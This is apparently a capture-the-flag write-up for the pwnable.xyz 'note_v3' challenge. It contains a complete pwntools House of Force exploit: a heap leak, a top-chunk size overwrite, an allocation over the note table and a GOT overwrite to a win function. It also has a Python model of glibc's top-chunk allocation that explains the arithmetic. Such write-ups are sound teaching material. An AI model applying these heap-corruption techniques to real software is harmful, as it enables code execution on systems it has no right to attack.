

The program has three functions: create a note, edit a note, and print the notes.

There is no free, but a heap overflow can be triggered, so I used House of Force to get a chunk allocated on top of the note table, wrote a GOT address into it, and then overwrote the GOT entry through note edit.
```python
from pwn import *

#context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30041)
#p = process("./note_v3", env = {"LD_PRELOAD" : "./alpine-libc-2.24.so"})
#gdb.attach(p)

def make(size, title, note=None):
    # menu 1: create a note with the given size and title (and a body, if the prompt appears)
    p.recvuntil(b"> ")
    p.sendline(b"1")
    p.recvuntil(b"Size: ")
    p.sendline(str(size).encode())
    p.recvuntil(b"Title: ")
    p.send(title)
    if note is not None:
        p.recvuntil(b"Note: ")
        p.send(note)

def edit(idx, data=None):
    # menu 2: edit note idx; this write is the heap-overflow primitive used below
    p.recvuntil(b"> ")
    p.sendline(b"2")
    p.recvuntil(b"Note: ")
    p.sendline(str(idx).encode())
    if data is not None:
        p.recvuntil(b"Data: ")
        p.send(data)

def list_note():
    # menu 3: print the notes (used for the heap leak)
    p.recvuntil(b"> ")
    p.sendline(b"3")

win  = 0x4008a2   # win function
note = 0x6012A0   # note table in .bss
puts = 0x601210   # puts@got, the first target tried; unused in the final chain

# leak: fill note 0 right up to the adjacent heap pointer so list_note() prints it
make(-1, b"AAAA")
make(0, b"AAAA")
payload = b"A" * 0x47
payload += b"B"
edit(0, payload)
list_note()
p.recvuntil(b"B")
heap = p.recv(4)            # 4-byte heap pointer (non-PIE binary, heap sits below 4 GiB)
heap += b"\x00" * 4
top_chunk = u64(heap) + 0x70
log.info("top chunk addr: " + hex(top_chunk))

# House of Force: overflow from note 1 into the top chunk's size field
make(-1, b"AAAA")
payload = b"A" * 0x88
payload += p64(0xffffffffffffffff)
edit(1, payload)

# request a (wrapped) size that moves the top chunk onto the note table, then
# store a GOT address there so a note entry now points into the GOT
target_chunk = (note + 0x20) - 0x30 - top_chunk
make(target_chunk, p64(0x00000000601228 - 0x10))

# editing through that corrupted entry overwrites the GOT slot with win
edit(4, p64(win))
p.interactive()
```
At first I overwrote the puts GOT entry, but it kept segfaulting, so after trying this and that I did it with printf instead.
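To make the top-chunk arithmetic behind `target_chunk` concrete, here is an added Python model of glibc's "use top" allocation path; it is my own example, not code from the write-up or from pwnable.xyz. It models `request2size()`, the out-of-range check and the top-chunk split of glibc 2.24-style `_int_malloc` (the libc the challenge ships), plus the top-size sanity check that glibc 2.29 added as an optional flag. The heap address 0x603070 and the system_mem value are constructed; 0x6012a0 is the note table address from the exploit.

```python
# Added example (not from the write-up): a model of the glibc <= 2.28 top-chunk
# allocation path, used to check House of Force size arithmetic offline.
MASK64 = (1 << 64) - 1
SIZE_SZ = 8              # sizeof(size_t) on x86-64
MALLOC_ALIGN_MASK = 0xf  # chunks are 16-byte aligned
MINSIZE = 0x20           # smallest chunk


def request2size(req):
    """glibc request2size(): add the size field, round up to 16, floor at MINSIZE.
    Everything is mod 2**64 because malloc does this in size_t."""
    req &= MASK64
    padded = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & MASK64
    if padded < MINSIZE:
        return MINSIZE
    return padded & ~MALLOC_ALIGN_MASK


class Arena:
    """Just the top chunk: its address, the size field in its header, and
    system_mem (constructed value) for the glibc >= 2.29 check."""
    def __init__(self, top_addr, top_size, system_mem=0x21000):
        self.top = top_addr
        self.top_size = top_size
        self.system_mem = system_mem


def malloc_from_top(av, req, glibc_2_29=False):
    """The 'use top' branch of _int_malloc. Returns the user pointer, None where
    the real allocator would refuse or fall through to sysmalloc(), and raises
    where glibc >= 2.29 aborts with "malloc(): corrupted top size"."""
    req &= MASK64
    if req >= (-2 * MINSIZE) & MASK64:          # checked_request2size -> ENOMEM
        return None
    nb = request2size(req)
    size = av.top_size & ~0x7                   # chunksize(): strip the flag bits
    if glibc_2_29 and size > av.system_mem:     # check added in glibc 2.29
        raise RuntimeError("malloc(): corrupted top size")
    if size < (nb + MINSIZE) & MASK64:          # top too small: sysmalloc(), not modeled
        return None
    victim = av.top
    av.top = (victim + nb) & MASK64             # top moves by nb; wrapping is allowed
    av.top_size = ((size - nb) & MASK64) | 1    # set_head(remainder, size | PREV_INUSE)
    return (victim + 2 * SIZE_SZ) & MASK64      # chunk2mem()


def house_of_force_size(top_addr, target):
    """Request size that moves top so the *next* malloc returns `target`:
    the new top header must land at target - 0x10, and request2size() adds
    back the 0x10 we subtract on top of that."""
    return (target - top_addr - 0x20) & MASK64


def demo(top_addr=0x603070, target=0x6012a0):
    """Run the technique against an honest and an overwritten top size field.
    top_addr is a constructed heap address for a non-PIE binary."""
    evil = house_of_force_size(top_addr, target)

    honest = Arena(top_addr, 0x20d91)            # plausible fresh top size | PREV_INUSE
    blocked = malloc_from_top(honest, evil)      # None: top is nowhere near big enough

    pwned = Arena(top_addr, 0xffffffffffffffff)  # size field after the overflow
    first = malloc_from_top(pwned, evil)         # succeeds and drags top to target - 0x10
    top_after = pwned.top
    second = malloc_from_top(pwned, 0x18)        # any small request now lands on target
    return evil, blocked, first, top_after, second


if __name__ == "__main__":
    evil, blocked, first, top_after, second = demo()
    print(f"request size      : {evil:#x}")
    print(f"honest top        : {blocked}")
    print(f"evil chunk        : {first:#x}, top now {top_after:#x}")
    print(f"next malloc(0x18) : {second:#x}")
```

Under this model the write-up's request `(note + 0x20) - 0x30 - top_chunk`, which is `note - 0x10 - top_chunk`, puts the next user pointer at `note + 0x10`; which field of the note table that hits depends on how the binary lays out a note, which the page does not show, so check it in the debugger rather than trusting the formula. With `glibc_2_29=True` the same sequence raises instead of returning, which is why the technique is tied to the old libc the challenge supplies.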